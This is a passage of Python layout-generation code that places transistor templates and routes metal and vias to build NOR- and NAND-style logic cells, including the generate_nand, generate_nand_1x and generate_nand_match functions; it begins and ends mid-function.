laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=in1.name, refpinname1='G0', refinstindex1=np.array([m - 1, 0])) rb0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 2]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='G0', refinstname1=in1.name, refpinname1='G0', endstyle0="extend", endstyle1="extend") laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='G0', gridname=rg_m2m3) # a0 for i in range(m): laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in4.name, refpinname0='G0', refinstindex0=np.array([i, 0]), refinstname1=ip4.name, refpinname1='G0', refinstindex1=np.array([i, 0]), ) laygen.via(None, np.array([0, 0]), refinstname=ip4.name, refpinname='G0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) if m == 1: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 0]), xy1=np.array([1, 0]), gridname0=rg_m1m2, refinstname0=ip4.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=ip4.name, refpinname1='G0', refinstindex1=np.array([m - 1, 0]), endstyle0="extend", endstyle1="extend") ra0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([-1, 0]), xy1=np.array([-1, 2]), gridname0=rg_m2m3, refinstname0=ip4.name, refpinname0='G0', refinstname1=ip4.name, refpinname1='G0', endstyle0="extend", endstyle1="extend") laygen.via(None, np.array([-1, 0]), refinstname=ip4.name, refpinname='G0', gridname=rg_m2m3) else: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=ip4.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=ip4.name, refpinname1='G0', refinstindex1=np.array([m - 1, 0])) ra0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 2]), gridname0=rg_m2m3, 
refinstname0=ip4.name, refpinname0='G0', refinstname1=ip4.name, refpinname1='G0', endstyle0="extend", endstyle1="extend") laygen.via(None, np.array([0, 0]), refinstname=ip4.name, refpinname='G0', gridname=rg_m2m3) # internal connection between mos laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 1]), xy1=np.array([0, 1]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='D0', refinstname1=in4.name, refpinname1='D0', refinstindex1=np.array([m - 1, 0])) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 1]), xy1=np.array([0, 1]), gridname0=rg_m2m3, refinstname0=ip1.name, refpinname0='D0', refinstname1=ip4.name, refpinname1='S1', refinstindex1=np.array([m - 1, 0])) for i in range(m): laygen.via(None, np.array([0, 1]), refinstname=in1.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 1]), refinstname=ip1.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 1]), refinstname=in4.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 1]), refinstname=ip4.name, refpinname='S0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 1]), refinstname=ip4.name, refpinname='S1', refinstindex=np.array([m-1, 0]), gridname=rg_m1m2) # output if m==1: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 0]), xy1=np.array([1, 0]), gridname0=rg_m2m3, refinstname0=ip4.name, refpinname0='D0', refinstindex0=np.array([0, 0]), refinstname1=ip4.name, refpinname1='D0', refinstindex1=np.array([m-1, 0]), endstyle0="extend", endstyle1="extend") else: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=ip4.name, refpinname0='D0', refinstindex0=np.array([0, 0]), refinstname1=ip4.name, refpinname1='D0', refinstindex1=np.array([m-1, 0])) ro0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), 
xy1=np.array([0, 1]), gridname0=rg_m2m3, refinstname0=ip4.name, refpinname0='D0', refinstindex0=np.array([m - 1, 0]), refinstname1=in4.name, refpinname1='D0', refinstindex1=np.array([m - 1, 0])) for i in range(m): laygen.via(None, np.array([0, 0]), refinstname=ip4.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=ip4.name, refpinname='D0', gridname=rg_m2m3, refinstindex=np.array([m - 1, 0])) laygen.via(None, np.array([0, 1]), refinstname=in4.name, refpinname='D0', gridname=rg_m2m3, refinstindex=np.array([m - 1, 0])) # power and ground route xy_s0 = laygen.get_template_pin_xy(ip1.cellname, 'S0', rg_m1m2)[0, :] for i in range(m): laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0 * np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=ip1.name, refinstindex0=np.array([i, 0]), refinstname1=ip1.name, refinstindex1=np.array([i, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0 * np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([i, 0]), refinstname1=in1.name, refinstindex1=np.array([i, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0 * np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=in4.name, refinstindex0=np.array([i, 0]), refinstname1=in4.name, refinstindex1=np.array([i, 0])) laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=ip1.name, gridname=rg_m1m2, refinstindex=np.array([i, 0])) laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=in1.name, gridname=rg_m1m2, refinstindex=np.array([i, 0])) laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=in4.name, gridname=rg_m1m2, refinstindex=np.array([i, 0])) xy_s1 = laygen.get_template_pin_xy(ip1.cellname, 'S1', rg_m1m2)[0, :] for i in range(m): laygen.route(None, laygen.layers['metal'][1], xy0=xy_s1 * np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2, refinstname0=ip1.name, refinstindex0=np.array([i, 0]), refinstname1=ip1.name, refinstindex1=np.array([i, 0])) 
laygen.route(None, laygen.layers['metal'][1], xy0=xy_s1 * np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([i, 0]), refinstname1=in1.name, refinstindex1=np.array([i, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s1 * np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2, refinstname0=in4.name, refinstindex0=np.array([i, 0]), refinstname1=in4.name, refinstindex1=np.array([i, 0])) laygen.via(None, xy_s1 * np.array([1, 0]), refinstname=ip1.name, gridname=rg_m1m2, refinstindex=np.array([i, 0])) laygen.via(None, xy_s1 * np.array([1, 0]), refinstname=in1.name, gridname=rg_m1m2, refinstindex=np.array([i, 0])) laygen.via(None, xy_s1 * np.array([1, 0]), refinstname=in4.name, gridname=rg_m1m2, refinstindex=np.array([i, 0])) # power and groud rail xy = laygen.get_xy(obj = ip5.template, gridname = rg_m1m2) * np.array([1, 0]) rvdd=laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip5.name) rvss=laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in5.name) # pin if create_pin == True: create_io_pin(laygen, layer=laygen.layers['pin'][3], gridname=rg_m2m3_pin, pinname_list = ['A', 'B', 'O'], rect_list=[ra0, rb0, ro0]) create_power_pin(laygen, layer=laygen.layers['pin'][2], gridname=rg_m1m2, rect_vdd=rvdd, rect_vss=rvss) def generate_nand(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m1m2_pin, routing_grid_m2m3_pin, devname_nmos_boundary, devname_nmos_body, devname_pmos_boundary, devname_pmos_body, m=1, origin=np.array([0,0]), create_pin=False): pg = placement_grid rg_m1m2 = routing_grid_m1m2 rg_m2m3 = routing_grid_m2m3 rg_m1m2_pin = routing_grid_m1m2_pin rg_m2m3_pin = routing_grid_m2m3_pin m=max(1, int(m/2)) #using nf=2 devices # placement in0 = laygen.place("I"+objectname_pfix + 'N0', 
devname_nmos_boundary, pg, xy=origin) in1 = laygen.relplace(name = "I"+objectname_pfix + 'N1', templatename = devname_nmos_body, gridname = pg, refinstname = in0.name, shape=np.array([m, 1])) in2 = laygen.relplace(name = "I" + objectname_pfix + 'N2', templatename = devname_nmos_boundary, gridname = pg, refinstname = in1.name) in3 = laygen.relplace(name = "I" + objectname_pfix + 'N3', templatename = devname_nmos_boundary, gridname = pg, refinstname = in2.name) in4 = laygen.relplace(name = "I"+objectname_pfix + 'N4', templatename = devname_nmos_body, gridname = pg, refinstname = in3.name, shape=np.array([m, 1])) in5 = laygen.relplace(name = "I"+objectname_pfix + 'N5', templatename = devname_nmos_boundary, gridname = pg, refinstname = in4.name) ip0 = laygen.relplace(name = "I"+objectname_pfix + 'P0', templatename = devname_pmos_boundary, gridname = pg, refinstname = in0.name, direction='top', transform='MX') ip1 = laygen.relplace(name = "I"+objectname_pfix + 'P1', templatename = devname_pmos_body, gridname = pg, refinstname = ip0.name, transform='MX', shape=np.array([m, 1])) ip2 = laygen.relplace(name = "I"+objectname_pfix + 'P2', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip1.name, transform='MX') ip3 = laygen.relplace(name = "I"+objectname_pfix + 'P3', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip2.name, transform='MX') ip4 = laygen.relplace(name = "I"+objectname_pfix + 'P4', templatename = devname_pmos_body, gridname = pg, refinstname = ip3.name, transform='MX', shape=np.array([m, 1])) ip5 = laygen.relplace(name = "I"+objectname_pfix + 'P5', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip4.name, transform='MX') # route # b0 for i in range(m): laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G0', refinstindex0=np.array([i, 0]), refinstname1=ip1.name, refpinname1='G0', refinstindex1=np.array([i, 0]), ) 
laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='G0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) if m == 1: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 0]), xy1=np.array([1, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=in1.name, refpinname1='G0', refinstindex1=np.array([m - 1, 0]), endstyle0="extend", endstyle1="extend") rb0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([-1, 0]), xy1=np.array([-1, 2]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='G0', refinstname1=in1.name, refpinname1='G0', endstyle0="extend", endstyle1="extend") laygen.via(None, np.array([-1, 0]), refinstname=in1.name, refpinname='G0', gridname=rg_m2m3) else: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=in1.name, refpinname1='G0', refinstindex1=np.array([m - 1, 0])) rb0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 2]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='G0', refinstname1=in1.name, refpinname1='G0', endstyle0="extend", endstyle1="extend") laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='G0', gridname=rg_m2m3) # a0 for i in range(m): laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in4.name, refpinname0='G0', refinstindex0=np.array([i, 0]), refinstname1=ip4.name, refpinname1='G0', refinstindex1=np.array([i, 0]), ) laygen.via(None, np.array([0, 0]), refinstname=ip4.name, refpinname='G0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) if m == 1: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 0]), xy1=np.array([1, 0]), gridname0=rg_m1m2, refinstname0=ip4.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=ip4.name, refpinname1='G0', 
refinstindex1=np.array([m - 1, 0]), endstyle0="extend", endstyle1="extend") ra0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([-1, 0]), xy1=np.array([-1, 2]), gridname0=rg_m2m3, refinstname0=ip4.name, refpinname0='G0', refinstname1=ip4.name, refpinname1='G0', endstyle0="extend", endstyle1="extend") laygen.via(None, np.array([-1, 0]), refinstname=ip4.name, refpinname='G0', gridname=rg_m2m3) else: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=ip4.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=ip4.name, refpinname1='G0', refinstindex1=np.array([m - 1, 0])) ra0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 2]), gridname0=rg_m2m3, refinstname0=ip4.name, refpinname0='G0', refinstname1=ip4.name, refpinname1='G0', endstyle0="extend", endstyle1="extend") laygen.via(None, np.array([0, 0]), refinstname=ip4.name, refpinname='G0', gridname=rg_m2m3) # internal connection between mos laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 1]), xy1=np.array([0, 1]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='D0', refinstname1=in4.name, refpinname1='S1', refinstindex1=np.array([m - 1, 0])) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 1]), xy1=np.array([0, 1]), gridname0=rg_m2m3, refinstname0=ip1.name, refpinname0='D0', refinstname1=ip4.name, refpinname1='D0', refinstindex1=np.array([m - 1, 0])) for i in range(m): laygen.via(None, np.array([0, 1]), refinstname=in1.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 1]), refinstname=ip1.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 1]), refinstname=in4.name, refpinname='S0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 1]), refinstname=ip4.name, refpinname='D0', refinstindex=np.array([i, 0]), 
gridname=rg_m1m2) laygen.via(None, np.array([0, 1]), refinstname=in4.name, refpinname='S1', refinstindex=np.array([m-1, 0]), gridname=rg_m1m2) # output if m==1: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 0]), xy1=np.array([1, 0]), gridname0=rg_m2m3, refinstname0=in4.name, refpinname0='D0', refinstindex0=np.array([0, 0]), refinstname1=in4.name, refpinname1='D0', refinstindex1=np.array([m-1, 0]), endstyle0="extend", endstyle1="extend") else: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=in4.name, refpinname0='D0', refinstindex0=np.array([0, 0]), refinstname1=in4.name, refpinname1='D0', refinstindex1=np.array([m-1, 0])) ro0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 1]), gridname0=rg_m2m3, refinstname0=in4.name, refpinname0='D0', refinstindex0=np.array([m - 1, 0]), refinstname1=ip4.name, refpinname1='D0', refinstindex1=np.array([m - 1, 0])) for i in range(m): laygen.via(None, np.array([0, 0]), refinstname=in4.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) #laygen.via(None, np.array([0, 0]), refinstname=in4.name, refpinname='S1', refinstindex=np.array([m - 1, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=in4.name, refpinname='D0', gridname=rg_m2m3, refinstindex=np.array([m - 1, 0])) laygen.via(None, np.array([0, 1]), refinstname=ip4.name, refpinname='D0', gridname=rg_m2m3, refinstindex=np.array([m - 1, 0])) # power and ground route xy_s0 = laygen.get_template_pin_xy(in1.cellname, 'S0', rg_m1m2)[0, :] for i in range(m): laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0 * np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([i, 0]), refinstname1=in1.name, refinstindex1=np.array([i, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0 * np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=ip1.name, 
refinstindex0=np.array([i, 0]), refinstname1=ip1.name, refinstindex1=np.array([i, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0 * np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=ip4.name, refinstindex0=np.array([i, 0]), refinstname1=ip4.name, refinstindex1=np.array([i, 0])) laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=in1.name, gridname=rg_m1m2, refinstindex=np.array([i, 0])) laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=ip1.name, gridname=rg_m1m2, refinstindex=np.array([i, 0])) laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=ip4.name, gridname=rg_m1m2, refinstindex=np.array([i, 0])) xy_s1 = laygen.get_template_pin_xy(in1.cellname, 'S1', rg_m1m2)[0, :] for i in range(m): laygen.route(None, laygen.layers['metal'][1], xy0=xy_s1 * np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([i, 0]), refinstname1=in1.name, refinstindex1=np.array([i, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s1 * np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2, refinstname0=ip1.name, refinstindex0=np.array([i, 0]), refinstname1=ip1.name, refinstindex1=np.array([i, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s1 * np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2, refinstname0=ip4.name, refinstindex0=np.array([i, 0]), refinstname1=ip4.name, refinstindex1=np.array([i, 0])) laygen.via(None, xy_s1 * np.array([1, 0]), refinstname=in1.name, gridname=rg_m1m2, refinstindex=np.array([i, 0])) laygen.via(None, xy_s1 * np.array([1, 0]), refinstname=ip1.name, gridname=rg_m1m2, refinstindex=np.array([i, 0])) laygen.via(None, xy_s1 * np.array([1, 0]), refinstname=ip4.name, gridname=rg_m1m2, refinstindex=np.array([i, 0])) # power and groud rail xy = laygen.get_xy(obj = in5.template, gridname = rg_m1m2) * np.array([1, 0]) rvdd=laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip5.name) 
rvss=laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in5.name) # pin if create_pin == True: create_io_pin(laygen, layer=laygen.layers['pin'][3], gridname=rg_m2m3_pin, pinname_list = ['A', 'B', 'O'], rect_list=[ra0, rb0, ro0]) create_power_pin(laygen, layer=laygen.layers['pin'][2], gridname=rg_m1m2, rect_vdd=rvdd, rect_vss=rvss) def generate_nand_1x(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m1m2_pin, routing_grid_m2m3_pin, devname_nmos_boundary, devname_nmos_body_2stack, devname_pmos_boundary, devname_pmos_body_left, devname_pmos_body_right, pin_o_yindex=0, origin=np.array([0, 0]), create_pin=False): pg = placement_grid rg_m1m2 = routing_grid_m1m2 rg_m2m3 = routing_grid_m2m3 rg_m1m2_pin = routing_grid_m1m2_pin rg_m2m3_pin = routing_grid_m2m3_pin # placement in0 = laygen.place("I"+objectname_pfix + 'N0', devname_nmos_boundary, pg, xy=origin) in1 = laygen.relplace(name = "I"+objectname_pfix + 'N1', templatename = devname_nmos_body_2stack, gridname = pg, refinstname = in0.name) #in2 = laygen.relplace(name = "I"+objectname_pfix + 'N2', templatename = devname_nmos_body_right, gridname = pg, refinstname = in1.name) in2 = laygen.relplace(name = "I"+objectname_pfix + 'N3', templatename = devname_nmos_boundary, gridname = pg, refinstname = in1.name) ip0 = laygen.relplace(name = "I"+objectname_pfix + 'P0', templatename = devname_pmos_boundary, gridname = pg, refinstname = in0.name, direction='top', transform='MX') ip1 = laygen.relplace(name = "I"+objectname_pfix + 'P1', templatename = devname_pmos_body_left, gridname = pg, refinstname = ip0.name, transform='MX') ip2 = laygen.relplace(name = "I"+objectname_pfix + 'P2', templatename = devname_pmos_body_right, gridname = pg, refinstname = ip1.name, transform='MX') ip3 = laygen.relplace(name = "I"+objectname_pfix + 'P3', templatename = devname_pmos_boundary, gridname = pg, 
refinstname = ip2.name, transform='MX') # route # B laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G0', refinstname1=ip1.name, refpinname1='G0') laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='G0', gridname=rg_m1m2) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([2, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G0', refinstname1=in1.name, refpinname1='G0', endstyle0="extend", endstyle1="extend") rb0 = laygen.route("R"+objectname_pfix+"A0", laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 2]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='G0', refinstname1=in1.name, refpinname1='G0') laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='G0', gridname=rg_m2m3) # A laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G1', refinstname1=ip2.name, refpinname1='G0') laygen.via(None, np.array([0, 0]), refinstname=ip2.name, refpinname='G0', gridname=rg_m1m2) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-2, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=ip2.name, refpinname0='G0', refinstname1=ip2.name, refpinname1='G0', endstyle0="extend", endstyle1="extend") ra0 = laygen.route("R"+objectname_pfix+"B0", laygen.layers['metal'][3], xy0=np.array([-1, 0]), xy1=np.array([-1, 2]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='G1', refinstname1=in1.name, refpinname1='G1') laygen.via(None, np.array([-1, 0]), refinstname=ip2.name, refpinname='G0', gridname=rg_m2m3) # output laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-2, pin_o_yindex]), xy1=np.array([0, pin_o_yindex]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='D0', refinstname1=in1.name, refpinname1='D0') laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-2, 
pin_o_yindex]), xy1=np.array([0, pin_o_yindex]), gridname0=rg_m2m3, refinstname0=ip2.name, refpinname0='D0', refinstname1=ip2.name, refpinname1='D0') ro0 = laygen.route("R"+objectname_pfix+"O0", laygen.layers['metal'][3], xy0=np.array([0, pin_o_yindex]), xy1=np.array([0, pin_o_yindex]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='D0', refinstname1=ip2.name, refpinname1='D0') laygen.via(None, np.array([0, pin_o_yindex]), refinstname=in1.name, refpinname='D0', gridname=rg_m1m2) laygen.via(None, np.array([0, pin_o_yindex]), refinstname=ip2.name, refpinname='S0', gridname=rg_m1m2) laygen.via(None, np.array([0, pin_o_yindex]), refinstname=in1.name, refpinname='D0', gridname=rg_m2m3) laygen.via(None, np.array([0, pin_o_yindex]), refinstname=ip2.name, refpinname='D0', gridname=rg_m2m3) # power and ground route xy_s0 = laygen.get_template_pin_xy(in1.cellname, 'S0', rg_m1m2)[0, :] laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0*np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=in1.name, refinstname1=in1.name) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0*np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=ip1.name, refinstname1=ip1.name) laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=in1.name, gridname=rg_m1m2) laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=ip1.name, gridname=rg_m1m2) xy_d0 = laygen.get_template_pin_xy(ip2.cellname, 'D0', rg_m1m2)[0, :] laygen.route(None, laygen.layers['metal'][1], xy0=xy_d0*np.array([1, 0]), xy1=xy_d0, gridname0=rg_m1m2, refinstname0=ip2.name, refinstname1=ip2.name) laygen.via(None, xy_d0 * np.array([1, 0]), refinstname=ip2.name, gridname=rg_m1m2) # power and groud rail xy = laygen.get_xy(obj = in2.template, gridname = rg_m1m2) * np.array([1, 0]) rvdd = laygen.route("R" + objectname_pfix + "VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip3.name) rvss = laygen.route("R" + objectname_pfix + "VSS0", 
laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in2.name) # pin if create_pin == True: create_io_pin(laygen, layer=laygen.layers['pin'][3], gridname=rg_m2m3_pin, pinname_list = ['A', 'B', 'O'], rect_list=[ra0, rb0, ro0]) create_power_pin(laygen, layer=laygen.layers['pin'][2], gridname=rg_m1m2, rect_vdd=rvdd, rect_vss=rvss) def generate_nand_match(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m1m2_pin, routing_grid_m2m3_pin, devname_nmos_boundary, devname_nmos_body, devname_pmos_boundary, devname_pmos_body, devname_pmos_dmy, m=1, origin=np.array([0,0]), create_pin=False): pg = placement_grid rg_m1m2 = routing_grid_m1m2 rg_m2m3 = routing_grid_m2m3 rg_m1m2_pin = routing_grid_m1m2_pin rg_m2m3_pin = routing_grid_m2m3_pin m=max(1, int(m/2)) #using nf=2 devices # placement in0 = laygen.place("I"+objectname_pfix + 'N0', devname_nmos_boundary, pg, xy=origin) in1 = laygen.relplace(name = "I"+objectname_pfix + 'N1', templatename = devname_nmos_body, gridname = pg, refinstname = in0.name, shape=np.array([m*2, 1])) in2 = laygen.relplace(name = "I" + objectname_pfix + 'N2', templatename = devname_nmos_boundary, gridname = pg, refinstname = in1.name) in3 = laygen.relplace(name = "I" + objectname_pfix + 'N3', templatename = devname_nmos_boundary, gridname = pg, refinstname = in2.name) in4 = laygen.relplace(name = "I"+objectname_pfix + 'N4', templatename = devname_nmos_body, gridname = pg, refinstname = in3.name, shape=np.array([m*2, 1])) in5 = laygen.relplace(name = "I"+objectname_pfix + 'N5', templatename = devname_nmos_boundary, gridname = pg, refinstname = in4.name) ip0 = laygen.relplace(name = "I"+objectname_pfix + 'P0', templatename = devname_pmos_boundary, gridname = pg, refinstname = in0.name, direction='top', transform='MX') ip1 = laygen.relplace(name = "I"+objectname_pfix + 'P1', templatename = devname_pmos_body, gridname = pg, refinstname = ip0.name, 
transform='MX', shape=np.array([m, 1])) ip1_sp = laygen.relplace(name = "I"+objectname_pfix + 'P1_SP', templatename = devname_pmos_dmy, gridname = pg, refinstname = ip1.name, transform='MX', shape=np.array([m, 1])) ip2 = laygen.relplace(name = "I"+objectname_pfix + 'P2', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip1_sp.name, transform='MX') ip3 = laygen.relplace(name = "I"+objectname_pfix + 'P3', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip2.name, transform='MX') ip4 = laygen.relplace(name = "I"+objectname_pfix + 'P4', templatename = devname_pmos_body, gridname = pg, refinstname = ip3.name, transform='MX', shape=np.array([m, 1])) ip4_sp = laygen.relplace(name = "I"+objectname_pfix + 'P4_SP', templatename = devname_pmos_dmy, gridname = pg, refinstname = ip4.name, transform='MX', shape=np.array([m, 1])) ip5 = laygen.relplace(name = "I"+objectname_pfix + 'P5', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip4_sp.name, transform='MX') # route # b0 for i in range(m): laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G0', refinstindex0=np.array([i, 0]), refinstname1=ip1.name, refpinname1='G0', refinstindex1=np.array([i, 0]), ) for i in range(m*2): laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='G0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) if m == 1: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 0]), xy1=np.array([1, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=in1.name, refpinname1='G0', refinstindex1=np.array([m*2 - 1, 0]), endstyle0="extend", endstyle1="extend") rb0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([-1, 0]), xy1=np.array([-1, 2]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='G0', refinstname1=in1.name, refpinname1='G0', endstyle0="extend", 
